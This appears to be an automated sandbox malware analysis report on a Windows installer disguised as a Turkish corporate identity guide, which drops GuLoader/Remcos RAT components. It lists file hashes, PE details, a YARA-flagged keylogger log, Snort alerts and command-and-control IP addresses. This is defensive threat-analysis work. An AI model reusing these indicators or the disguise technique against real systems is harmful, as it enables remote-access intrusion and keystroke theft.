                                                                                                                                                                                        SHA-512:C5E9C6FD1758372506862E1FC15908B38C1B43E201DE29268D558724F247765B4740D0B3FAF1072C89497C958207E7711C25364AFCEC42D94B1D482E3FE8AF62
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.......`..p6...A......i..^...d...7........v.r.......L.......b.7.....6.\..G....C...H..J.....U.......nO.........%.OW..p..........+....'..6.[..I............K.......6..N.........Y.............H...V...v.2...>..o.z.....V*........I......S..A.........+_.t!........W......&....5j....3....;.`..........0:f...[..D. ?..N....^..o..E...Kfb..~`......og......m.\..... .)..........v...........o......~.E......H.....s..'.......@.....ic.T..J)..z................{......~..lk.{.......;.......W....r...:.."._s............r.....o(..+u......0....8..../,$."....~........c.......`.MF.........b...j....F.........t....L......Q....................'......P. ....a....l.....*.)..S.;Z.......j........G.M.....\.<$.............4.D.................f.#o.a...6U......P`.....b..c=r....k.?...mf..-.L.&.^.....Q.W......v.R..>.....j......=...W.i...~.....`...I.%................Q...........*..t.c-.......\.........+......[Z....|@....+.......[..I..4u......>..(".@..vD..............j.............=.....=..:.J\..`...."?...........6...

                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tmrerlrernes43\Uvejsommere\Bkforeller\vandforsyningsresursen\kalkvrksarbejderens.jdi

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60936
                                                                                                                                                                                        Entropy (8bit):4.941570218027665
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:klZbNthMxOfJDEhKk7ZcwYZdCZCEyu+IR9UOXCiNWuB7PiUijMAXj0kkOSsfh0H/:cbNthMeY5KPZddZubPUOyGOjMy9ZCM2Z
                                                                                                                                                                                        MD5:68CA93776C32C0E64B548D8DBD644F53
                                                                                                                                                                                        SHA1:31A5168074A7E51333EBF1D3DE639BE217F67090
                                                                                                                                                                                        SHA-256:BD45F54B75BED5EA8F7975F8C3A56CB2F491AAFE456889E206A1EC114458E688
                                                                                                                                                                                        SHA-512:37F4392783956A78F4D58F729BC3D439A3CC750880EFD0D9C3462416AFA6624898B6365A85824285A08CE827F74AA4D5C499136A1E5DCC6ABD08D0BA72AAA056
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..{.......@...[......4....F.../_..I..<.:.,.WU....t.Tr.........!......Q).Z.....................#[g..........<|%.P..............|@.....5.........5............../.....S...............].......b...+..........u.............Yr....../......?y.....[....q.>.e.............^.......O.W..1..2.w.........."....\Ya....Jm.kJ.3....#..........V..........i2...G.6w..).....w...........o.Yi.;-......a..."~...4...ip>..8...a.......#.......f...........4[.b.X%c......7Y.T....h[.'._....em.........dF.......2.nm........M..h....8.{N.O.........^k................p.........R....L........b..WT..E.../..2..........b.......q...................n...J.........\.....s.$....0............).......x...........&................y........:.............m..................=..%...........6...<51..................N..;......'S...5.Q......\..B........}.`..7......B..Z........r......j.....*...W......K..s................{....Z........d..\.........x.........%..FVOr...+.....k....|...D...!..F.<.W....e....|......................

                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tmrerlrernes43\Uvejsommere\Bkforeller\vandforsyningsresursen\lhegnets.paa

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5772
                                                                                                                                                                                        Entropy (8bit):5.0190422599771916
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:l7N6//NAW/UyIMf8ozTEg60Pn9sRWwdWudZvsyoB//jI8tFe+L4V+7QY:lZANAJaf8w00VWWwdWudBsfBDvtFbe+H
                                                                                                                                                                                        MD5:6E7B32029BC6B2939D3DB26CFB356D0A
                                                                                                                                                                                        SHA1:058C4830759F6A0765FDDE01A9BB8EDB49E6FCC8
                                                                                                                                                                                        SHA-256:22A733CFC276620E89DDC62817CD5BE8CF0878B39E6428B8F492B27CB0493D5A
                                                                                                                                                                                        SHA-512:9CB878B6A42BB5B5D927764E0C17310C1D96AEAE79B411C3EDC5C26E7F08D8A2483152FB46A1083AC163D5D0DC1342A932616E8F8F57338957A7C33FAD6E22DF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:KD...<t[..s........1.2{..g...I........@.!.....N.....l.f...Q..b..U..... .C.w..q...;.....4.........D.F-Y..b..!L....... ....O.... ....*..K...?..N.........7S...~...F.............C...(.K..F....$..p...(..........M........X.Z.J.......J..C..........7....De..........M....?...F........y.............b2.....e.7.......,.D..N.x...?D.....'Y`......pZ...........6..L..4..M....g.....3..........d.........rM=.B..,.L........k.......W.........t.....................7...........|........./..'b.....f..s....#.hc....F...[............}.6D.........L:......D...............&...........e...z.E..B'./..i..E..........G.........O..q...........-........&...$........3...............-......6................c..d...x......................Ta.m.p."........z.4..[...l...........I.y....I.....yr.............L..4*.3....................I..:................)....i.......O.5d................C.u...L.........n...7......R............T.,.....`..................I.........>...z.z..7s..."*....... ....Yp.....................7..k

                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tmrerlrernes43\Uvejsommere\Bkforeller\vandforsyningsresursen\slotsaftappet.gen

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):6559
                                                                                                                                                                                        Entropy (8bit):4.921661324722055
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:akWOmmtj+X1R/KrjMbP1K3F+m9V5YIR2A7nVc/YJ0wu43AjdgHyp57rQE:abODkFNwsqYIR2anVc/Y64wVp5rQE
                                                                                                                                                                                        MD5:CD2B020F955E136B859D4D73544F295E
                                                                                                                                                                                        SHA1:10CB6A1A901E87493B4F9B84B5E9AF3CF6638E93
                                                                                                                                                                                        SHA-256:9722ACF73CF6726F2559DC59FF3C10395F03AE63844D85C9465765B07B42E912
                                                                                                                                                                                        SHA-512:8238980FE0A953B2FD02AE3E1CAB2130C69A971BD8600AD88AA350D2BEBA21657E5350537C5F129D0E9936D9FC25462F9A0A068C95096743C70BD0E269DA37BC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:P.....@...............{...........d..N^.w..T"....;6..l.......e...K.........w.......f.N........0T..T.}.'.............Y..........a..........4.F...D..:.p...N.].G....}.....+....c.......r...H/{|................m..'.....[#......v..M....Z.......!.......]...............=..$J)...'......J...q.....R-......5Oy..e................S.........!L^......................j........i.........I.J..}...7.......k.5..h..........v.C....)9...................=............`..Z..e....b....................;.......m..\..B.m.7....C$........p.....KJt............J...V..............................,....O......3.....k........X....?.................G...;...H...$..........Y...........m.....................Pe.9....:...........k....2(........2...L...........................M...~.S......B6...........z........).J..l............A......]q....G..^F...7....j...........iD.......=...(...n........4.......o...V.....9....4..............q........._.T....T.......@F.k...........2........o...w......;.................u.....D^{.......

                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tmrerlrernes43\Uvejsommere\Bkforeller\vandforsyningsresursen\uforanderligheden.mia

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):9024
                                                                                                                                                                                        Entropy (8bit):4.915362970792497
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:nbskfPxqJalVbEEuR/9WTZcs+JjwB6FLEF:h44lVbED1MZEjbU
                                                                                                                                                                                        MD5:98BCC29584ED7524EE0492F24B14615D
                                                                                                                                                                                        SHA1:6493DBB937D31911C82A8D39B553891D8B0A49BD
                                                                                                                                                                                        SHA-256:39C72F185A55457B25BEC67A88BAE7FDBCCEE4880AA8F8D132FBC9DEB3D547BE
                                                                                                                                                                                        SHA-512:8C1A3121923FCE3B588B68F917F2B14BBD5B098434111CFDEBE47D17DF84E377AA2328F5E3F5C1712FCE65682E1A37160A3BEA7789A6205A6BFAB6F8227B9DF3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:t..................U......Hr.....%.K.........t...K............o..............I..)..Y}..~(...........|..B....]..z.Z.g..bz.........4M..c.......=%.......3.......................h...)...J.g..e.Ia...................*..~.....I....\ZB.(.N..@...G.....-.8.e....2..Tx........Z...>2..........C.\\L......s....R.d[RA.............W.....N.......?.....#.YQ........~...H.].f=<."e.....Q...........2...|...........Z..`.....*...O..u....Z....D...............{. ..B..;. ...(...Q..............'..5....a...X..K..........$t.............M.....g.....h..../..i....Z...q.....H.O4.]...pU.!......\...<....K..:K..............n.....Za..s.r..........,.......m......r.....(........L........3.....H.j......32. ).A...@...O....N.......T.....O...>.......................`..Q.....a.........v...;...U..S.....6b............0N.3............g..04..&.....)..........^...k..................K......a..m2q...s.X....O.........&^.....r..r.D..f.,.y....;....._..&... {.......!..y.............:...........?WihX4.....C.......2/..............O.

                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tmrerlrernes43\Uvejsommere\Bkforeller\vandforsyningsresursen\ununderstood.per

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):39320
                                                                                                                                                                                        Entropy (8bit):4.944998067109953
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:m0jW1kE+iOvfiB0MmQW8ySRbgWKmj3zLJVDvKOu4gLZ77l3IFN:m0OkhyB0fS7KmDZVDCF4gtFaN
                                                                                                                                                                                        MD5:D1BF712E659E946D9EF4FC4CCEF11819
                                                                                                                                                                                        SHA1:50817BAD8D0F4FF70330FA3B0B0391E7686DBB8B
                                                                                                                                                                                        SHA-256:7BB763ED1B34F080F73FDC632C65DB5B1D261B0CBCC9B6BB79E5C14297641867
                                                                                                                                                                                        SHA-512:FE47F385330B3C71B345A584BBEF83783D060902B7677652763CF07A6A0FF69C5B84DD6E6B34316E72907966427DA317A852606F18999C4A3238EC382CA4C3A1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.(Xx....&..._......................a.E....6....S......................-..~xT.....6...............H%\......).......o..6r......B........UN......Y.:s........O..tE...._..........U`._y......J.6w........Q.....C..9.^....................~....gj.......\.........\Q............L..............H...9.............g..@.8...........>..b.......[........f....W..8...........n...E.....i.v...................=.5..................6.}...............r....|.B....0...........<....u.....\]..........N..T..6..)J.........1..J....$...................;...........Q.f.G?S..hq......D..8hK....x......D........Id....=..=.............;....-...z.......Mh...?...3...!............!.4~..y.....]0..........I.......*k...,p................r.7...x..Q........X........H...p?.............n..i.....i.....B..........O.|..............g....1..."`..?..2.~.........}.........f....#.............>P.!..F......+P......CR........\..'<..T....k...QH.....<.@.4.f.....XI..?...........c......;...>.s.?...W.....Y..........?.........L.1.....X.

                                                                                                                                                                                        C:\Users\user\AppData\Roaming\paqlgkfs.dat

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                        Entropy (8bit):3.372779061566145
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6:KlrlxulDBA5YcIeeDAlslrlxulDB0bWAAe5ElrlxulDBtlR1ylrlxulDBzbWAv:KlrlxuluecmlrlxulubWFe5ElrlxulcI
                                                                                                                                                                                        MD5:1F8E67F2CE8D5C22338439E4A50B28E5
                                                                                                                                                                                        SHA1:268CF27FA0AD58250CD370F17DB380494739C350
                                                                                                                                                                                        SHA-256:BBECB263D5156AB6D0E909BD12CB5D18366D5A225AAA0E1CAB12D9D19BA386D4
                                                                                                                                                                                        SHA-512:F5DA74E8517C30AD4369268F5AC1E784469183FA4C17FCC0E9CCF013084900FCA53C13809826D331B796D7598FCA5DBC60048C7A76176ABD7AFE1FD8F67E4624
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
                                                                                                                                                                                        Preview:....[.2.0.2.3./.1.0./.3.0. .1.4.:.1.7.:.5.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.3.0. .1.4.:.1.7.:.5.1. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.3./.1.0./.3.0. .1.4.:.1.7.:.5.2. .R.u.n.].........[.2.0.2.3./.1.0./.3.0. .1.4.:.1.7.:.5.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                        Entropy (8bit):7.558574413908491
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        File size:740'313 bytes
                                                                                                                                                                                        MD5:f6cbf303899397b7d28e19930d48627d
                                                                                                                                                                                        SHA1:c3b2d0902bc0724228519030d341294db265f379
                                                                                                                                                                                        SHA256:2eb8015d95b1f69eca4acc3d64c0ed58125431a19df865a493990025ebe5b40a
                                                                                                                                                                                        SHA512:0e70a67684146e4dd4d3d7984ef66b03f5370340b82cc86b1d79408c102b06bb69a31a17addec773c24fddd3e4780c35a780d549bd944aaa33a0b73f68f57b68
                                                                                                                                                                                        SSDEEP:12288:uJWNBQf/tJK1Znk1YAxpqPf+4u+432AAjI9XLvlDwLEuSflue6VfFtqdXFJ:uWg49k1jcdDHjkbvFHfluNtqdXFJ
                                                                                                                                                                                        TLSH:5AF4E0216A2AF903E2F203F09567DF756B618D550E7F8A738791EE2B78FC3811D18216
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:4dcdeeee7d595823

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x40338f
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push esi
                                                                                                                                                                                        push edi
                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                        pop edi
                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                        call dword ptr [004080A8h]
                                                                                                                                                                                        call dword ptr [004080A4h]
                                                                                                                                                                                        and eax, BFFFFFFFh
                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                        mov dword ptr [00434EECh], eax
                                                                                                                                                                                        je 00007FA3148A3BD3h
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        call 00007FA3148A6E85h
                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                        je 00007FA3148A3BC9h
                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                        call eax
                                                                                                                                                                                        mov esi, 004082B0h
                                                                                                                                                                                        push esi
                                                                                                                                                                                        call 00007FA3148A6DFFh
                                                                                                                                                                                        push esi
                                                                                                                                                                                        call dword ptr [00408150h]
                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                                                                                        jne 00007FA3148A3BACh
                                                                                                                                                                                        push 0000000Ah
                                                                                                                                                                                        call 00007FA3148A6E58h
                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                        call 00007FA3148A6E51h
                                                                                                                                                                                        push 00000006h
                                                                                                                                                                                        mov dword ptr [00434EE4h], eax
                                                                                                                                                                                        call 00007FA3148A6E45h
                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                        je 00007FA3148A3BD1h
                                                                                                                                                                                        push 0000001Eh
                                                                                                                                                                                        call eax
                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                        je 00007FA3148A3BC9h
                                                                                                                                                                                        or byte ptr [00434EEFh], 00000040h
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        call dword ptr [00408044h]
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        call dword ptr [004082A0h]
                                                                                                                                                                                        mov dword ptr [00434FB8h], eax
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                        push eax
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push 0042B208h
                                                                                                                                                                                        call dword ptr [00408188h]
                                                                                                                                                                                        push 0040A2C8h

                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7f0000x2adb8.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        .text0x10000x66270x6800False0.6643629807692307data6.451784672975888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .rdata0x80000x14a20x1600False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .data0xa0000x2aff80x600False0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .ndata0x350000x4a0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rsrc0x7f0000x2adb80x2ae00False0.2931623542274053data4.844476982593675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                        RT_BITMAP0x7f4900x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                                                        RT_ICON0x7f7f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25415532946882763
                                                                                                                                                                                        RT_ICON0x900200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3174795038890057
                                                                                                                                                                                        RT_ICON0x994c80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3372458410351202
                                                                                                                                                                                        RT_ICON0x9e9500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.30196032120925836
                                                                                                                                                                                        RT_ICON0xa2b780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.37105809128630707
                                                                                                                                                                                        RT_ICON0xa51200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41135084427767354
                                                                                                                                                                                        RT_ICON0xa61c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.35954157782515994
                                                                                                                                                                                        RT_ICON0xa70700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5004098360655738
                                                                                                                                                                                        RT_ICON0xa79f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.35333935018050544
                                                                                                                                                                                        RT_ICON0xa82a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.35023041474654376
                                                                                                                                                                                        RT_ICON0xa89680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.26372832369942195
                                                                                                                                                                                        RT_ICON0xa8ed00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5647163120567376
                                                                                                                                                                                        RT_DIALOG0xa93380x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                                                        RT_DIALOG0xa94800x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                                                        RT_DIALOG0xa95c00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                        RT_DIALOG0xa96c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                        RT_DIALOG0xa97e00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                        RT_GROUP_ICON0xa98400xaedataEnglishUnited States0.6609195402298851
                                                                                                                                                                                        RT_VERSION0xa98f00x178VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79EnglishUnited States0.5664893617021277
                                                                                                                                                                                        RT_MANIFEST0xa9a680x34eXML 1.0 document, ASCII text, with very long lines (846), with no line terminatorsEnglishUnited States0.5141843971631206

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                        192.168.11.2094.156.6.2535009424022032776 10/30/23-14:17:52.394655TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin500942402192.168.11.2094.156.6.253
                                                                                                                                                                                        192.168.11.20217.147.225.6950093802855192 10/30/23-14:17:49.596833TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M25009380192.168.11.20217.147.225.69
                                                                                                                                                                                        94.156.6.253192.168.11.202402500942032777 10/30/23-14:20:09.593886TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response24025009494.156.6.253192.168.11.20

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Oct 30, 2023 14:17:49.290796041 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.595316887 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.595613956 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.596832991 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.901787996 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.904386997 CET8050093217.147.225.69192.168.11.20
